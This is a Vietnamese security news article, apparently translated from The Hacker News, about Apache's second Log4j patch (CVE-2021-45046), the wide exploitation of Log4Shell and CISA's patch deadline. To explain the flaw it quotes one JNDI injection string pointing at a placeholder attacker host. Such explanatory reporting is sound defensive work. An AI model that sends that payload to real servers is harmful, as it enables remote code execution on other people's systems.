Apache Software Foundation (ASF) đã đưa ra một bản sửa lỗi mới cho tiện ích ghi nhật ký Log4j sau khi bản vá trước đó cho cách khai thác Log4Shell được tiết lộ gần đây được coi là “không hoàn chỉnh trong một số cấu hình không phải mặc định.”

Lỗ hổng thứ hai có tên mã theo dõi là CVE-2021-45046 – được xếp hạng 3,7 trên tổng số tối đa 10 trên hệ thống xếp hạng CVSS và ảnh hưởng đến tất cả các phiên bản của Log4j từ 2.0-beta9 đến 2.12.1 và 2.13.0 đến 2.15.0.

Bản vá chưa hoàn chỉnh cho CVE-2021-44228 có thể bị lạm dụng để “tạo dữ liệu đầu vào độc hại bằng cách sử dụng mẫu Tra cứu JNDI dẫn đến tấn công từ chối dịch vụ (DoS)”, ASF cho biết trong một tư vấn mới. Phiên bản mới nhất của Log4j, 2.16.0 (dành cho người dùng yêu cầu Java 8 trở lên), còn người dùng Java 7 được khuyến nghị nâng cấp lên bản phát hành Log4j 2.12.2 khi chúng có sẵn.

JNDI, viết tắt của Java Naming and Directory Interface, là một API Java cho phép các ứng dụng được mã hóa bằng ngôn ngữ lập trình tìm kiếm dữ liệu và tài nguyên như máy chủ LDAP . Log4Shell nằm trong thư viện Log4j, một khung ghi nhật ký mã nguồn mở, dựa trên Java thường được tích hợp vào các máy chủ web Apache.

Sự cố tự xảy ra khi thành phần JNDI của trình kết nối LDAP được tận dụng để đưa vào một yêu cầu LDAP độc hại – chẳng hạn như “$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}” – tức là khi đăng nhập trên máy chủ web đang chạy phiên bản dễ bị tấn công của thư viện, cho phép kẻ tấn công truy xuất tải trọng từ một miền từ xa và thực thi nó cục bộ.

Bản cập nhật mới nhất xuất hiện khi lỗ hổng từ lỗ hổng đã dẫn đến “đại dịch mạng thực sự”, điều mà một số tác nhân đe dọa đang nắm giữ trên Log4Shell theo những cách đặt nền tảng cho các cuộc tấn công tiếp theo , bao gồm triển khai công cụ khai thác tiền, trojan truy cập từ xa và ransomware trên những kẻ dễ bị tấn công máy móc. Các cuộc xâm nhập cơ hội được cho là đã bắt đầu ít nhất kể từ ngày 1 tháng 12, mặc dù lỗi này đã trở thành thông tin phổ biến vào ngày 9 tháng 12.

Lỗ hổng bảo mật được cảnh báo rộng rãi vì nó tồn tại trong một khuôn khổ ghi nhật ký được sử dụng gần như phổ biến trong các ứng dụng Java, cho thấy những kẻ xấu có một cửa ngõ chưa từng có để xâm nhập và xâm nhập hàng triệu thiết bị trên khắp thế giới, và tương đối dễ dàng.

“Không giống như các cuộc tấn công mạng lớn khác liên quan đến một hoặc một số phần mềm hạn chế, Log4j về cơ bản được nhúng trong mọi sản phẩm hoặc dịch vụ web dựa trên Java. Rất khó để khắc phục chúng theo cách thủ công”, công ty bảo mật Check Point của Israel cho biết . “Lỗ hổng này, do sự phức tạp trong việc vá lỗi và sự dễ dàng khai thác, có vẻ như nó sẽ ở lại với chúng ta trong nhiều năm tới, trừ khi các công ty và dịch vụ có hành động ngay lập tức để ngăn chặn các cuộc tấn công vào sản phẩm của họ bằng cách triển khai biện pháp bảo vệ.”

Trong những ngày sau khi lỗi được tiết lộ, ít nhất mười nhóm khác nhau đã tham gia vào cuộc khai thác và khoảng 44% mạng công ty trên toàn cầu đã bị tấn công, đánh dấu một sự leo thang đáng kể. Hơn nữa, các băng nhóm tội phạm đóng vai trò là người môi giới truy cập đã bắt đầu sử dụng lỗ hổng để giành được chỗ đứng ban đầu vào các mạng mục tiêu và sau đó bán quyền truy cập cho các chi nhánh của ransomware-as-a-service (RaaS).

Việc vũ khí hóa quy mô lớn đối với lỗ hổng thực thi mã từ xa đã khiến Cơ quan An ninh mạng và Cơ sở hạ tầng Hoa Kỳ (CISA) thêm Log4Shell vào Danh mục các lỗ hổng được khai thác đã biết , đưa ra thời hạn cho các cơ quan liên bang là ngày 24 tháng 12 để kết hợp các bản vá cho lỗ hổng này và thúc giục các nhà cung cấp để “ngay lập tức xác định, giảm thiểu và vá các sản phẩm bị ảnh hưởng bằng cách sử dụng Log4j.”

“Ưu tiên trước mắt nhất đối với những người bảo vệ là giảm khả năng bị lộ bằng cách vá và giảm thiểu tất cả các góc của cơ sở hạ tầng của họ và điều tra các hệ thống bị lộ và có khả năng bị xâm phạm. Lỗ hổng này có thể ở khắp mọi nơi” … Theo THN

AT3 EDU VN -CEH VIETNAM